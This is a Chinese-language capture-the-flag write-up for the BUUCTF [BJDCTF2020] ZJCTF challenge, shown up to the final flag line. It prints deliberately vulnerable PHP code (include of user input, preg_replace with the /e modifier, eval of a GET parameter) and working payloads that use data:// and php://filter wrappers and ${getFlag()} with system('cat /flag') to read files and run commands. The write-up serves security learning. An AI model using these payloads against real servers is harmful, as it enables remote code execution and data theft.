BUUCTF [BJDCTF2020] ZJCTF，不过如此

考点：

1. php伪协议读取源码
2. 函数preg_replace()在\e模式下，存在代码执行漏洞
3. 对于传入的非法的$_GET数组参数名，会将其转换成下划线_

启动环境，给出源码：

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

分析代码：

• 需要通过GET方式传入变量$text变量$flie的值
• file_get_contents()函数以只读方式打开
• 变量$text中内容应为I have a dream
• 提示变量$file的值应该为next.php

file_get_contents()函数把整个文件读入一个字符串中，可以使用php伪协议，传入变量$text的值，并且读出next.php的源码：

?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

将内容进行Base64解码，得到next.php页面的源码：

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace('/('.$re.')/ei', 'strtolower("\\1")', $str);
}

foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

源码分析：

• 需要通过GET方式传入变量$id的值
• complex()函数将变量$re、strtolower("\\1")、变量$str进行拼接替换
• foreach()函数将$_GET数组中的键名赋给变量$re，键值赋给变量$str
• getFlag()函数可以实现命令执行

函数preg_replace()在\e模式下，存在代码执行漏洞
参考文章：深入研究preg_replace与代码执行

通过查阅资料
preg_replace()使用了/e模式，可以代码执行，而且该函数的第一个和第三个参数都是我们可以控制的。
preg_replac()函数当匹配到符合正则表达式的字符串时，第二个参数的字符串可被当做代码来执行。

strtolower("\\1")当中的\\1实际上就是\1 ，这里的\1实际上指定的是第一个子匹配项，而\1在正则表达式中有自己的含义。

反向引用：
对一个正则表达式模式或部分模式 两边添加圆括号 将导致相关 匹配存储到一个临时缓冲区 中，所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。缓冲区编号从 1 开始，最多可存储 99 个捕获的子表达式。每个缓冲区都可以使用 ‘\n’ 访问，其中 n 为一个标识特定缓冲区的一位或两位十进制数。

另外，在PHP中，对于传入的非法的$_GET数组参数名，会将其转换成下划线，比如.，所以构造：\S*=${phpinfo()}测试：

可以看到phpinfo()命令被成功执行，尝试执行getFlag()函数：

next.php?\S*=${getFlag()}&cmd=system('pwd');

可以看到命令被成功执行，继续寻找flag的位置：

next.php?\S*=${getFlag()}&cmd=system('ls /');

flag在/目录下，构造最终Payload：

next.php?\S*=${getFlag()}&cmd=system('cat /flag');

得到flag：